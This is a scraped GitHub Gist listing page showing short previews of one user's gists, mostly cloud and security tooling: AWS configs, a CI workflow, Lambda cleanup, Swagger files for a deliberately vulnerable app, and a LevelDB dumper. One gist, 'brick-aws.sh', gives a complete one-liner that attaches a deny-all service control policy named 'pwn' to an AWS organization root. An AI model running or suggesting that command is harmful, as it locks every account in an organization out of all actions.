Kinnaird McQuade kmcquade
kmcquade
/ AWS API calls that return credentials.md
Last active
May 2, 2024 14:39
AWS API calls that return credentials
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "agent": { | |
| "metrics_collection_interval": 60 | |
| }, | |
| "logs": { | |
| "logs_collected": { | |
| "files": { | |
| "collect_list": [ | |
| { | |
| "file_path": "/home/ec2-user/shared-volume/zap.log", |
kmcquade
/ app.yaml
Created
February 2, 2024 05:55
— forked from alukach/app.yaml
An example Github Actions for Python + Pipenv + Postgres + Pyright
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # .github/workflows/app.yaml | |
| name: My Python Project | |
| on: push | |
| jobs: | |
| test: | |
| runs-on: ubuntu-latest | |
| timeout-minutes: 10 | |
| services: |
kmcquade
/ clean_old_lambda_versions.py
Created
December 5, 2023 18:47
— forked from tobywf/clean_old_lambda_versions.py
A quick script to remove old AWS Lambda function versions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from __future__ import absolute_import, print_function, unicode_literals | |
| import boto3 | |
| def clean_old_lambda_versions(): | |
| client = boto3.client('lambda') | |
| functions = client.list_functions()['Functions'] | |
| for function in functions: | |
| versions = client.list_versions_by_function(FunctionName=function['FunctionArn'])['Versions'] | |
| for version in versions: |
kmcquade
/ dvws-node-swagger.json
Last active
November 16, 2023 17:49
dvws-node Swagger file. The swagger.js file in the repo is in a javascript object but I need it to be yaml/json and downloadable. So downloading it from gist. Here is the original: https://github.com/vulnerable-apps/dvws-node/blob/master/swagger.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "openapi": "3.0.1", | |
| "info": { | |
| "title": "DVWS API", | |
| "description": "API Used for DVWS Application", | |
| "version": "0.1" | |
| }, | |
| "servers": [ | |
| { | |
| "url": "http://dvws.local" |
kmcquade
/ jellyfin-openapi-stable.json
Created
November 16, 2023 14:14
11/16/2023 download of Jellyfin's Swagger doc. https://api.jellyfin.org/openapi/jellyfin-openapi-stable.json
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "openapi": "3.0.1", | |
| "info": { | |
| "title": "Jellyfin API", | |
| "version": "10.8.12", | |
| "x-jellyfin-version": "10.8.12" | |
| }, | |
| "servers": [ | |
| { | |
| "url": "http://localhost" |
kmcquade
/ brick-aws.sh
Last active
September 26, 2023 22:52
One-liner to brick AWS accounts from the Master Payer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aws organizations attach-policy \ | |
| --policy-id $(aws organizations create-policy --name pwn \ | |
| --type SERVICE_CONTROL_POLICY \ | |
| --description "pwn" | |
| --content '{"Version": "2012-10-17","Statement": [{"Effect": "Deny", "Action": "*", "Resource": "*"}]}' \ | |
| | jq ".Policy.PolicySummary.Id"\ | |
| ) \ | |
| --target-id $(aws organizations list-roots | jq ".Roots | .[0].Id") |
These are python 2 and 3 snippets showing how to generate headers to authenticate with HashiCorp's Vault using the AWS authentication method. There's also a Ruby implementation which uses version 3 of the AWS SDK for Ruby.
The python scripts look for credentials in the
default boto3 locations;
if you need to supply custom credentials (such as from an AssumeRole call), you would use the
botocore.session.set_credentials
method before calling create_client.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Gmail doesn't work using regular recording. It will only work if you run the recording script and then wrap the recorded script in this | |
| """ | |
| from playwright.sync_api import Playwright, sync_playwright, expect | |
| from playwright._impl._api_types import Error as PlaywrightError | |
| def run(pw: Playwright) -> None: | |
| args = [ |
kmcquade
/ ldbdump.py
Created
November 6, 2022 20:23
— forked from mkorthof/ldbdump.py
ldbdump - dumps LevelDB keys/values
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # ldbdump - dumps LevelDB keys/values | |
| # | |
| # a LevelDB is a dir with files such a these: | |
| # 000050.ldb 000100.log CURRENT LOCK LOG MANIFEST-000099 | |
| # | |
| # sources: https://github.com/tos-kamiya/levelobjdb dump() | |
| import os |
NewerOlder